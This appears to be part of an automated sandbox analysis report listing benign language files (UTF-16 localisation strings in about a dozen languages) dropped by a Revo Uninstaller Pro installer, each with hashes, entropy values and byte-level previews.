                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.H.r.v.a.t.s.k.i./.C.r.o.a.t.i.a.n. .....W.e.b.L.a.n.g.=.H.R.....T.r.a.n.s.l.a.t.o.r.=.H.a.s.a.n. .O.s.m.a.n.a.g.i.......C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.3...1...8.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .I.z.g.l.e.d.....1.0.3. .=. .P.o.s.t.a.v.k.e.....1.0.4. .=. .D.e.i.n.s.t.a.l.e.r.....1.0.5. .=. .A.l.a.t.i.....1.0.6. .=. .P.r.e.s.r.e.t.a.n.j.e.....1.0.7. .=. .P.o.p.i.s.....1.0.8. .=. .I.k.o.n.e.....1.0.9. .=. .D.e.t.a.l.j.i.....1.1.0. .=. .D.e.i.n.s.t.a.l.i.r.a.j.....1.1.1. .=. .U.k.l.o.n.i. .u.n.o.s.....1.1.2. .=. .O.s.v.j.e.~.i.....1.1.3. .=. .U.k.l.o.n.i.t.i. .o.z.n.a...e.n.i. .u.n.o.s.?.....1.1.4. .=. .D.e.i.n.s.t.a.l.i.r.a.t.i. .o.z.n.a...e.n.i. .p.r.o.g.r.a.m.?.....1.1.5. .=. .D.o.g.r.a.d.n.j.a.....1.1.6. .=. .P.o.m.o.......1.1.7. .=. .U.p.u.t.e...........
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (675), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):134684
                                                                                                                                            Entropy (8bit):3.6263066482370334
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:WuphjkIdd/DdEIK0maAmDwQPVC0fwodhjAMX+907+AjwVm+MV8iW8HjJkSADPUFj:huPUTmK
                                                                                                                                            MD5:9D502EA4D293E8CDD722B1CC120ACE31
                                                                                                                                            SHA1:004732BAADE360FB190885B26C8D0F477B89935D
                                                                                                                                            SHA-256:D362840E3245B77979D529C10C755E21AF193F0406BD850D813673E17D888A26
                                                                                                                                            SHA-512:29261C915860319189B31C72C581B33C1F4967C2D77B924A8FCD530930E8B2C418030FC55993A188E5EC956D75D3F91BE89F4E25C31FC4A9DA005FC6B6F134D7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.M.a.g.y.a.r./.H.u.n.g.a.r.i.a.n.....W.e.b.L.a.n.g.=.H.U.N.....T.r.a.n.s.l.a.t.o.r.=.D...b.r...n.t.e.i. .S...n.d.o.r. .-. .s.a.n.d.o.r...d.o.b.r.o.n.t.e.i.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .N...z.e.t.....1.0.3. .=. .B.e...l.l...t...s.o.k.....1.0.4. .=. .E.l.t...v.o.l...t.......1.0.5. .=. .E.s.z.k...z...k.....1.0.6. .=. .K.e.r.e.s.Q. .m...d.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.k.o.n.o.k.....1.0.9. .=. .R...s.z.l.e.t.e.k.....1.1.0. .=. .E.l.t...v.o.l...t...s.....1.1.1. .=. .B.e.j.e.g.y.z...s. .t...r.l...s.e.....1.1.2. .=. .F.r.i.s.s...t...s.....1.1.3. .=. .B.i.z.t.o.s. .b.e.n.n.e.,. .h.o.g.y. .t...r.l.i. .a. .k.i.j.e.l...l.t. .b.e.j.e.g.y.z...s.t.?.....1.1.4. .=. .B.i.z.t.o.s. .b.e.n.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (717), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):127392
                                                                                                                                            Entropy (8bit):3.4614005609864864
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:locWzmYvaewluEO21T4oOdCWKWdOvHLu1ab9YVU/yfIyN07kr5VRQ2BNi4ZVRENz:Yulu0hCdOvHqb95cB3k5k
                                                                                                                                            MD5:59F2A36A20215347BEB58ACB7CEABA53
                                                                                                                                            SHA1:40C01D8893E698F802095D8ED5CD6CC05A4B7A0B
                                                                                                                                            SHA-256:30388CC2C429EFB94253B926C64BE4D167C2F362DB09300AC4554520DF419C56
                                                                                                                                            SHA-512:DF87473B891803D14592C53E2EC5878DCD0391B51991D712BAE4F9E0B5F5C2819B510009448F8B516AE926BDF551B43DFD8F524B549D6476E5608F6C919E83A2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.B.a.h.a.s.a. .I.n.d.o.n.e.s.i.a./.I.n.d.o.n.e.s.i.a.n.....W.e.b.L.a.n.g.=.I.N.D.....T.r.a.n.s.l.a.t.o.r.=.P.u.r.w.o. .A.d.i. .N.u.g.r.o.h.o.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .L.i.h.a.t.....1.0.3. .=. .P.i.l.i.h.a.n.....1.0.4. .=. .P.e.n.g.h.a.p.u.s.....1.0.5. .=. .P.e.r.a.l.a.t.a.n.....1.0.6. .=. .M.o.d.e. .P.e.m.b.u.r.u.....1.0.7. .=. .D.a.f.t.a.r.....1.0.8. .=. .I.k.o.n.....1.0.9. .=. .R.i.n.c.i.a.n.....1.1.0. .=. .H.a.p.u.s.....1.1.1. .=. .H.a.p.u.s. .C.a.t.a.t.a.n.....1.1.2. .=. .S.e.g.a.r.k.a.n.....1.1.3. .=. .A.p.a.k.a.h. .a.n.d.a. .y.a.k.i.n. .i.n.g.i.n. .m.e.n.g.h.a.p.u.s. .c.a.t.a.t.a.n. .t.e.r.p.i.l.i.h.?.....1.1.4. .=. .A.p.a.k.a.h. .a.n.d.a. .y.a.k.i.n. .i.n.g.i.n. .m.e.n.g.h.a.p.u.s. .p.r.o.g.r.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (662), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):142466
                                                                                                                                            Entropy (8bit):3.396814543249537
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:eNJzHR1iVUz5T/mHE+fs1eEDVUcdPNjVlKEhL98UAueg8fC:kJzHTX5TeHE+f+eEDVNdPhVlKwZ8dgaC
                                                                                                                                            MD5:71BAA3C894A26E3C285262E34960F6C8
                                                                                                                                            SHA1:33509E1740D10D7FD813F353BDE5BC1DB4A699B0
                                                                                                                                            SHA-256:9B287843DA49B5975FEA024EA51BD68AA8B03A9946F3CF043201D524033F77DF
                                                                                                                                            SHA-512:A7E40761892BC379CE907BA55E3AA4E9AE0DA50454DB8D2BBC89467E5F66A031B740B654362AEA2189F8DEC5AD759456890B991719886D75D74DFAB508929F1B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.I.t.a.l.i.a.n.o./.I.t.a.l.i.a.n.....W.e.b.L.a.n.g.=.I.T.A.....T.r.a.n.s.l.a.t.o.r.=.M.a.r.i.a. .G.r.a.z.i.a. .B.a.r.b.i.e.r.i.,.M.a.s.s.i.m.o. .C.a.s.t.i.g.l.i.a.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.s.u.a.l.i.z.z.a.z.i.o.n.e.....1.0.3. .=. .O.p.z.i.o.n.i.....1.0.4. .=. .D.i.s.i.n.s.t.a.l.l.a.t.o.r.e.....1.0.5. .=. .S.t.r.u.m.e.n.t.i.....1.0.6. .=. .M.o.d.o. .m.i.r.i.n.o.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.c.o.n.e.....1.0.9. .=. .D.e.t.t.a.g.l.i.....1.1.0. .=. .D.i.s.i.n.s.t.a.l.l.a.....1.1.1. .=. .R.i.m.u.o.v.i. .v.o.c.e.....1.1.2. .=. .A.g.g.i.o.r.n.a.....1.1.3. .=. .S.i.c.u.r.o. .d.i. .v.o.l.e.r. .r.i.m.u.o.v.e.r.e. .l.a. .v.o.c.e. .s.e.l.e.z.i.o.n.a.t.a.?.....1.1.4. .=. .S.i.c.u.r.o. .d.i. .v.o.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):77404
                                                                                                                                            Entropy (8bit):5.228699203430081
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:84p2dHm7WVI3NNRdZKxCJNFYsWXrQ2YjnW9Xq3iQSa0qqMyeqXLRZEvAcrNcV5Gx:j2dHgWWfRdZbNF/WXrQ2YLW963iQSa0+
                                                                                                                                            MD5:040C2D8EBC17DACAF936A472088110A4
                                                                                                                                            SHA1:A8CA607E209452B7886F6E9CBEAA7253623496FE
                                                                                                                                            SHA-256:2F2DC8C8727EC6C1E4898E150A8CD962F394C37ECEF6838CE0807CE8363A9358
                                                                                                                                            SHA-512:3AD8367F4F2A52BD6B975AFDED53BDEC5A25439DADB81DFC78A67626F7250C284A6BA5AF73F489FD94734CC178D9F3217D34F4C73A9A6109636CA09BC100DB59
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=..e,g../.J.a.p.a.n.e.s.e.....W.e.b.L.a.n.g.=.J.P.N.....T.r.a.n.s.l.a.t.o.r.=.T.i.l.t.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .h.:y-..[....1.0.3. .=. ..0.0.0.0.0....1.0.4. .=. ..0.0.0.0.0.0.0.0....1.0.5. .=. ..0.0.0....1.0.6. .=. ..0.0.0.0.0.0.0....1.0.7. .=. ..N......1.0.8. .=. ..0.0.0.0....1.0.9. .=. .s.0}....1.1.0. .=. ..0.0.0.0.0.0.0.0....1.1.1. .=. ..0.0.0.0.0d..S....1.1.2. .=. ..f.e....1.1.3. .=. .x..bU0.0_0.0.0.0.0.0,gS_k0JRd.W0~0Y0K0?.....1.1.4. .=. .x..bU0.0_0.0.0.0.0.0.0,gS_k0.0.0.0.0.0.0.0.0W0~0Y0K0?.....1.1.5. .=. ..0.0.0.0.0.0....1.1.6. .=. ..0.0.0....1.1.7. .=. ..0.0.0.0.0.0..........1.1.8. .=. ..0.0.0.0.0.0..........1.1.9. .=. ..0.0.0.0.0.`1X..........1.2.0. .=. ..{.t..)jP.g0.0.0.0.0W0f0O0`0U0D0!.....1.2.1.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (412), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):77282
                                                                                                                                            Entropy (8bit):5.344405966542523
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lohuLfu+X83GXjDzy48AISFuPm553g6R6JCezMzd4ytJ7r2BtEaClqc:ACfu+X83GXjPyx9Sn53g6R6JO7EMlqc
                                                                                                                                            MD5:9B08D7938D6B83218D43FA1F884D821A
                                                                                                                                            SHA1:D8B4B40502954521DDA2955C2CC0919B80CB8188
                                                                                                                                            SHA-256:88B117C0F2A37A375F86EF3C686288C954A88F4647230DE58C47D7532FFC7115
                                                                                                                                            SHA-512:4E471F55D3D65D196202415071797E855AA2A93B26D25128686D5A68BF04A9D0307D4C3B22179A3B55384918819524B1ECD46CAD9DE0C9C406529A82F41764CE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.\.m... ./. .K.o.r.e.a.n.....W.e.b.L.a.n.g.=.K.O.R.....T.r.a.n.s.l.a.t.o.r.=.J.a.e.H.y.u.n.g. .L.e.e. ./. .k.o.l.a.n.p.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...0.....1.0.3. .=. .5.X.....1.0.4. .=. ...p.0.....1.0.5. .=. ..l.....1.0.6. .=. ...0.......1.0.7. .=. .........1.0.8. .=. .D.t.X.....1.0.9. .=. .8... .........1.1.0. .=. ...\..... ...p.....1.1.1. .=. . ... .m.. ...p.....1.1.2. .=. .... ........1.1.3. .=. ....\. . ...\. .m..D. ...p.X.......L.?.....1.1.4. .=. ....\. . ...\. ...\.....D. ...p.X.......L.?.....1.1.5. .=. ...p.t......1.1.6. .=. .........1.1.7. .=. .... ..l. ...............1.1.8. .=. .H..t.............1.1.9. .=. .... ...............1.2.0. .=. ...X.. .........
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (531), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):69202
                                                                                                                                            Entropy (8bit):3.580198978681514
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lojEDwthZmIwWc3bBtbD0ANX8If2WDafbdoV4XL26VZiIJBPbdBnXPaei7:s+hX18bBRD2
                                                                                                                                            MD5:2CE2A032457DDD8E1DC8868CC1C75A48
                                                                                                                                            SHA1:9229850C65FA487A26C9FE4DDA51C302533C195B
                                                                                                                                            SHA-256:0AF0D6E4657ED06CCD5AE0FB5E8E3BFBE0CE3950757F1AC109C1104DB051F98F
                                                                                                                                            SHA-512:3D1EBA1104A15189EDC30033D7EA011E9F2EB623941464238506F487D58CBA87A05B3CC2E8860FF5CCAB0CD637796AF49A132CBF21C7B3E2F2F6004BE6B0935C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.K.u.r.d.../.K.u.r.d.i.s.h.....W.e.b.L.a.n.g.=.K.U.R.....T.r.a.n.s.l.a.t.o.r.=.O.c.c.o. .M.a.h.a.b.a.d. .-. .o.c.c.o.7.4.@.h.o.t.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.2...5...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .D...m.e.n.....1.0.3. .=. .E.y.a.r.....1.0.4. .=. .U.n.i.n.s.t.a.l.l.e.r./.R.a.k.e.r.....1.0.5. .=. .A.m...r.....1.0.6. .=. .M.o.d.a. .N.......r.v.a.n.....1.0.7. .=. .L...s.t.e.....1.0.8. .=. .S...m.g.e.....1.0.9. .=. .D.e.t.a.y.....1.1.0. .=. .R.a.k.e.....1.1.1. .=. .Q.e.y.d... .R.a.k.e.....1.1.2. .=. .N... .B.i.k.e.....1.1.3. .=. .Q.e.y.d.a. .h.i.l.b.i.j.a.r.t... .w.e.r.e. .r.a.k.i.r.i.n.?.....1.1.4. .=. .B.e.r.n.a.m.e.y.a. .h.i.l.b.i.j.a.r.t... .w.e.r.e. .r.a.k.i.r.i.n.?.....1.1.5. .=. .R.o.j.a.n.e. .B.i.k.e.....1.1.6. .=. .A.l...
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (484), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):110288
                                                                                                                                            Entropy (8bit):3.9383295798946234
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:4seY/kLsTdMxIxQazH+KM5N59cSvvbbuig36p7Ne8hVudV1vNWM3ktFRDlxD8ygB:jeY/6xIxQazH+KM5N59cSvvbbuig3SuD
                                                                                                                                            MD5:B78738D6771FCA62516F8EB15C9460DB
                                                                                                                                            SHA1:69D6F4193A9CD53776162E491BA0C78CDAE77966
                                                                                                                                            SHA-256:A93CFABCDCC7D9876EBD2BD3775E77EE4B194870A981588F747BC01F7EC86FB5
                                                                                                                                            SHA-512:5CCE82FCA675751A9E22C0F15C938C237B15E63422DE436A6E448D34F8FB8819E9F41E4F01B5117983F615B38029363FC7B1DBC58B7B9268BC1B54294A803652
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=...0.:.5.4.>.=.A.:.8./.M.a.c.e.d.o.n.i.a.n.....W.e.b.L.a.n.g.=.M.K.D.....T.r.a.n.s.l.a.t.o.r.=.0.1. .V.l.a.t.c.e.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...7.3.;.5.4.....1.0.3. .=. ...?.F.8.8.....1.0.4. .=. ...5.8.=.A.B.0.;.5.@.....1.0.5. .=. ...;.0.B.:.8.....1.0.6. .=. ...>.4. .=.0. .1.0.@.0.Z.5.....1.0.7. .=. ...8.A.B.0.....1.0.8. .=. ...:.>.=.8.....1.0.9. .=. ...5.B.0.;.8.....1.1.0. .=. ...5.8.=.A.B.0.;.8.@.0.X.....1.1.1. .=. ...B.A.B.@.0.=.8. .3.>. .2.=.5.A.>.B.....1.1.2. .=. ...A.2.5.6.8.....1.1.3. .=. ...0.;.8. .A.B.5. .A.8.3.C.@.=.8. .4.5.:.0. .A.0.:.0.B.5. .4.0. .3.>. .B.@.3.=.5.B.5. .A.5.;.5.:.B.8.@.0.=.8.>.B. .2.=.5.A.?.....1.1.4. .=. ...0.;.8. .A.B.5. .A.8.3.C.@.=.8. .4.5.:.0. .A.0.:.0.B.5. .4.0. .3.>. .4.5.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (435), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):116584
                                                                                                                                            Entropy (8bit):3.4724567340731216
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:FW7jQkbLU+miBrdji6E+X4teDexIa073UCYIRWq13rSsVLYU4:Mbi
                                                                                                                                            MD5:D5A24F2D5AE12A843240E354EB26BCD6
                                                                                                                                            SHA1:A2BD707D7195CD1A3163D4F33750457F5D889DE9
                                                                                                                                            SHA-256:FF3F554C0F9249C1F76E7E9B2F4CA8EDE2CA42459BE3BE37A483DEC10D64F73E
                                                                                                                                            SHA-512:533F1FF1D5414A1941C408BB29B855B2D1851CE05C5EFEA24B9D4AFA7232933CC08BB67DFCCBA4F4B3C0798F934AC4452730A1164C17ECAE0C6C8BE69D0ABCF4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .N.o.r.s.k./.N.o.r.w.e.g.i.a.n.....W.e.b.L.a.n.g.=.N.O.R.....T.r.a.n.s.l.a.t.o.r.=.P.a.a.l. .R.o.n.n.i.n.g.e.n.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.s.....1.0.3. .=. .A.l.t.e.r.n.a.t.i.v.....1.0.4. .=. .A.v.i.n.s.t.a.l.l.e.r.e.r.....1.0.5. .=. .V.e.r.k.t...y.....1.0.6. .=. .J.a.k.t.m.o.d.u.s.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .I.k.o.n.e.r.....1.0.9. .=. .D.e.t.a.l.j.e.r.....1.1.0. .=. .A.v.i.n.s.t.a.l.l.e.r.e.....1.1.1. .=. .T.a. .b.o.r.t. .p.o.s.t.....1.1.2. .=. .O.p.p.d.a.t.e.r.e. .p.r.o.g.r.a.m.l.i.s.t.e.n.....1.1.3. .=. .V.i.l. .d.u. .v.i.r.k.e.l.i.g. .t.a. .b.o.r.t. .V.a.l.g.t. .p.o.s.t.?.....1.1.4. .=. .V.i.l. .d.u. .v.i.r.k.e.l.i.g. .t.a. .b.o.r.t. .V.a.l.g.t. .p.r.o.g.r.a.m.?.....1.1.5. .=. .O.p.p.d.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (1970), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):121434
                                                                                                                                            Entropy (8bit):3.814439127324583
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:loaWsQeVjoYi8L0q1NzZ08iZnDt9+b311fUiXMkISCNXLz3UhUp:cr4oYi8L0q1c8MDv+bl1fhyBz3so
                                                                                                                                            MD5:3C10E3A4E879163DC1AC916D3AAE316C
                                                                                                                                            SHA1:3F5D75D837EF2490AB6C5B035855766443DF5A4B
                                                                                                                                            SHA-256:7173C74A1CD8F6AE7AEABF34A4AFA18DA73D1E595850C06953BF70CA8326F3D0
                                                                                                                                            SHA-512:14538BDFE3DFE2EE7DA9FF84E7E13B591732F0161622C203DB487009A6CB23E2760BEC5459B5FAD620184F2CC19F09D5865DF8F03C51BFD44A18C4CEE73AE03C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.A.'.1.3.J./.P.e.r.s.i.a.n.....W.e.b.L.a.n.g.=.F.A.R.....T.r.a.n.s.l.a.t.o.r.=.E.G.F./.3. .9.(./.'.D.1.6.'. .4.A.'..... .|. .E.d.i.t.e.d. .B.y. .A.l.i.r.e.z.a. .K.a.l.a.l.i.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....V.e.r.s.i.o.n.=.4...0...5.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2.=.F.E.'.J.4.....1.0.3.=.*.F.8.J.E.'.*.....1.0.4.=.-.0.A. ...F.F./.G.....1.0.5.=.'.(.2.'.1.G.'.....1.0.6.=.-.'.D.*.\.n. .4...'.1...J.....1.0.7.=.A.G.1.3.*.....1.0.8.=.4.E.'.J.D.....1.0.9.=.,.2.&.J.'.*.....1.1.0.=.-.0.A. .(.1.F.'.E.G.....1.1.1.=.-.0.A. .H.1.H./.J. .....1.1.2.=.*.'.2.G. .3.'.2.J.....1.1.3.=.".J.'. .E.7.E.&.F. .(.G. .-.0.A. .H.1.H./.J. .'.F.*...'.(. .4./.G. .G.3.*.J./. .......1.1.4.=.".J.'. .E.7.E.&.F. .(.G. ...1.H.,. .(.1.F.'.E.G. .(.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (512), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):125354
                                                                                                                                            Entropy (8bit):3.6916938529521914
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:loKRrsLkYOChte3GW00OKansDxs1ugPaqP9L97jcpvqRtNCOuvMYrcmPulvhvFNO:GRJnsDyYgP5P9LWEZBPCzAObr
                                                                                                                                            MD5:00E4EA38C09BE2C82D4062345B74C975
                                                                                                                                            SHA1:1644834E917EF74EF374C63D740076C61B18F07F
                                                                                                                                            SHA-256:20F8BDF0C06B31434AD9A6D515477A86D84E758490E47DB1724E358A48A650F3
                                                                                                                                            SHA-512:7CFC2B303F1B8CB25B63B726491A0062F2184D7E2A60911EB3235E3E8F50167610C043F2C3E0DF32C6DE76C454D2D74597F286988D87BE3D81259AAC3426CE18
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.P.o.l.s.k.i./.P.o.l.i.s.h.....W.e.b.L.a.n.g.=.P.L.....T.r.a.n.s.l.a.t.o.r.=.h.i.r.y.u.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .W.i.d.o.k.....1.0.3. .=. .O.p.c.j.e.....1.0.4. .=. .D.e.i.n.s.t.a.l.a.t.o.r.....1.0.5. .=. .N.a.r.z...d.z.i.a.....1.0.6. .=. .T.r.y.b. .B.o.w.c.y.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.k.o.n.y.....1.0.9. .=. .S.z.c.z.e.g...B.y.....1.1.0. .=. .O.d.i.n.s.t.a.l.u.j.....1.1.1. .=. .U.s.u.D. .w.p.i.s.....1.1.2. .=. .O.d.[.w.i.e.|.....1.1.3. .=. .C.z.y. .n.a. .p.e.w.n.o. .u.s.u.n..... .z.a.z.n.a.c.z.o.n.y. .o.b.i.e.k.t.?.....1.1.4. .=. .C.z.y. .n.a. .p.e.w.n.o. .o.d.i.n.s.t.a.l.o.w.a... .z.a.z.n.a.c.z.o.n.y. .p.r.o.g.r.a.m.?.....1.1.5. .=. .A.k.t.u.a.l.i.z.u.j.....1.1.6. .=. .P.o.m.o.c.....
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (772), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):140588
                                                                                                                                            Entropy (8bit):3.4494661461016882
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:L3UBZgoBUk7SJAW+UMwHdaIaSnutDxbheao+fBpdaA1a16Q1D5DerB2Tm:YghYgnutD7/
                                                                                                                                            MD5:500FBED3543879F343C8081B2FDF1FF5
                                                                                                                                            SHA1:AC859C7013C87DD824C73ED77970BD973762EEE0
                                                                                                                                            SHA-256:9436996BABA11BC3CFD246CEB4C3F70185806A5612027990D6999F469E09AC5E
